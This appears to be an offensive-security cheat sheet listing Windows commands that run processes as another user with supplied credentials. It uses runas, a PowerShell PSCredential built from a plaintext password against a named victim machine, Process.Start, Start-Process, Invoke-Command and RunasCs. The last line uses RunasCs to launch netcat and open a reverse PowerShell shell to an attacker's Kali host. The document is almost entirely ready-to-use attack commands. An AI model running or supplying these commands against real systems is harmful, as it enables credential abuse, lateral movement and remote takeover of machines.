CMD

Local

runas /u:<user> powershell.exe

Domain

runas /user:DOMAIN\Username "powershell.exe"

Powershell

$cred = New-Object System.Management.Automation.PSCredential('<HOSTNAME>\<USERNAME>', $(ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force))
$computer = "<VICTIM MACHINE>"

Process.Start

[System.Diagnostics.Process]::Start("C:\Windows\System32\cmd.exe", "/c ping -n 1 10.10.13.37", $cred.Username, $cred.Password, $computer)

Start-Process

Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c ping -n 1 10.10.13.37" -Credential $cred

Invoke-Command

Invoke-Command -ComputerName $computer -ScriptBlock { whoami } -Credential $cred

RunasCs

.\runascs.exe -d '<DOMAIN>' '<USERNAME>' '<PASSWORD>' 'C:\temp\nc.exe <IP_KALI> <PORT_KALI> -e powershell.exe'